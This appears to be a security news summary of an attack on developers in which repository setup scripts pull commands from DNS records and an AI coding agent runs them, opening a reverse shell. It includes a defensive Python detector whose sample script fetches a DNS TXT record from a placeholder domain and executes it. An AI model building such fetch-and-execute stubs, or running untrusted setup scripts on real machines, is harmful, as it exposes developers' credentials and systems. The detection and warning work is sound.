In detail
- Attackers hide commands in DNS entries that are fetched by setup scripts at runtime – the malicious code never exists in the repository itself and remains invisible to scanners and code reviews.
- Claude Code automatically runs the setup script when an error occurs and opens a reverse shell for the attacker, who can then steal API keys and login credentials and gain persistent access to the machine.
- A single repository link in a job posting, tutorial, or Slack message is enough to compromise any developer who opens the repo with an AI coding tool.
- Solution: AI agents should display setup scripts before execution; developers should treat third-party setup instructions as untrusted code.
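
One way to apply the "treat setup instructions as untrusted code" advice before an agent runs anything, as an added example (not code from the original report or from any tool named here): a small Python check that flags shell setup scripts in which DNS lookup output reaches an interpreter. The list of lookup tools, the severity labels and the sample script are assumptions constructed for illustration.

```python
import re

# Tools whose output is text taken from DNS answers (for example TXT records).
DNS_LOOKUP = re.compile(r"\b(dig|nslookup|host|drill|kdig)\b")
# Constructs that run a string as code.
EXEC_SINK = re.compile(
    r"\b(eval|source)\b|\b(ba|z|da)?sh\s+-c\b|\|\s*(ba|z|da)?sh\b|\bpython3?\s+-c\b"
)
ASSIGN = re.compile(r"^(?:export\s+)?([A-Za-z_]\w*)=(.*)$")


def uses_var(text, names):
    """True if text expands any of the given shell variables ($X or ${X})."""
    return any(re.search(r"\$\{?" + re.escape(n) + r"\b", text) for n in names)


def review_setup_script(script):
    """Return (line_no, severity, line) findings; 'block' means DNS data is executed."""
    findings, tainted = [], set()
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        has_dns = bool(DNS_LOOKUP.search(line))
        carries_dns = has_dns or uses_var(line, tainted)
        m = ASSIGN.match(line)
        if m and (has_dns or uses_var(m.group(2), tainted)):
            tainted.add(m.group(1))  # variable now holds DNS-derived text
        if EXEC_SINK.search(line) and carries_dns:
            findings.append((no, "block", line))
        elif has_dns:
            findings.append((no, "review", line))
    return findings


# Constructed sample script (not from the incident); example.invalid never resolves.
SAMPLE = """#!/bin/sh
pip install -r requirements.txt
eval "$(ssh-agent -s)"
REC=$(dig +short TXT cfg.example.invalid)
STEP=$(echo "$REC" | tr -d '"')
sh -c "$STEP"
"""

if __name__ == "__main__":
    for no, severity, line in review_setup_script(SAMPLE):
        print(f"{severity:6} line {no}: {line}")
```

This is a line-based heuristic: the commands themselves are not in the repository, but the stub that fetches and executes them is, and that stub is what the check looks for.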
Why it matters
For developers and companies using AI coding tools, this is an immediate security risk – a single click on a prepared GitHub link can lead to credential theft and loss of control over the development machine.
For you
Check whether your team uses Claude Code or similar tools, and instruct developers not to automatically open GitHub repositories from unknown sources with AI agents, and especially not to let those agents run setup scripts.